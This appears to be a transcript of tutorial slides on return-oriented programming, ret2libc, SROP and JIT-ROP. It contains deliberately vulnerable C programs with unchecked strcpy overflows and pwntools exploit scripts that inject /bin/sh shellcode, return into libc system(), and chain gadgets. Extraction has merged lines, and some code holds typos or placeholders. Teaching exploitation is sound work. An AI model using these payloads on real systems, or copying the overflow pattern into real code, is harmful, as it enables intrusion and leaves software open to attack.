rop and it's friends
TRANSCRIPT
ROPand it’s friends BY Rakesh Paruchuri
CONTENTS
> WHAT IS ROP> THE NEED FOR ROP > ROP vs RET2LIBC> FRIENDS
what is rop?
→ return oriented programming→ take advantage of buffer overflow→ gain control over instruction pointer→ chain them with gadgets
NEED FOR ROPTO EXPLOIT CODE WE NEED
CODE EXECUTIONOVERFLOW BUFFER ON THE STACK GET CONTROL OVER EIPOVERWRITE SAVED RETURN ADDRESS
LET’S GIVE A TRY
#include<stdio.h>int main(int argc,char **argv) {
char buffer[50];strcpy(buffer,argv[1]);return 0;
}
Exploit:from pwn import *payload = ''payload += '\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh'payload += 'A'*16payload += p32(0xffffd676)
print payload
Return To Libc
NX: Protection mechanism aimed to NOT EXECUTE STACK But can corrupt stack and control EIP
why not point eip to something which can create shell
Return To Libc
→ assuming libc is static (ALSR OFF)→ padding “blah blah” into buffer to reach eip → overwriting &system into saved eip→ supplying “/bin/sh” as argument
LET’S GIVE A TRY
#include<stdlib.h>int main(int argc,char **argv) {
char buffer[50]; strcpy(buffer,argv[1]); return 0;}
→
EXPOIT
from pwn import *payload = ''payload += 'A'*54payload += p32(0xf7e48190) # &systempayload += 'BBBB' payload += p32(0xf7f68a24) # &’/bin/sh’
print payload
ROP
ASLR Protection mechanism aimed to randomize the addresses of Shared libraries and virtual memory
What is rop??
→ return oriented programming → re-use pieces of code from code segment→ assemble all pieces into desired shell code
GADGETS
gadget is any instruction sequence ending with RET instruction
ret = pop eip
EXAMPLE FOR GADGET
→ store several values in registers→ you don’t lose control over EIP because of @RET instruction at the ending of the gadget
corresponding code for the gadget
payload += p64(0x401093)payload += p64(0xrbx)payload += p64(0xrbp)payload += p64(0xr12)payload += p64(next_gadget)
LET’S GIVE A TRY#include<stdio.h>
static int flag;
void vuln_function1(){ flag++;}
void vuln_function2(){ if(flag == 1) system("/bin/sh");}
int main(int argc,char **argv) { char buf[50]; strcpy(buf,argv[1]); return 0;}
EXPLOITfrom pwn import *
payload = ''payload += "A"*54payload += p32(0x0804844d) #address of vuln_function1payload += p32(0x08048536) # pop ebx ; ret payload += p32(0xdeedbeef)payload += p32(0x0804845f) #address of vunl_function2
print payload
ROP vs RET2LIBC
RET2LIBCROP
SROP
→ less number of gadgets→ building shell code by chaining system calls→ attackers set up fake signal frames and initiate and returns from signals that the kernel never delivered
exploiting rop registers
eip
esp
exploiting srop registers
eip
esp
exploiting srop registers
eip
esp
exploiting srop registers
eip
esp
JIT-ROP
→ Fine-grained address space layout randomization→ offset keeps varying → requires a information leak→ chaining of gadgets must be done at run time
→ executing shellcode in stack→ ret2libc→ rop→ srop & jit-rop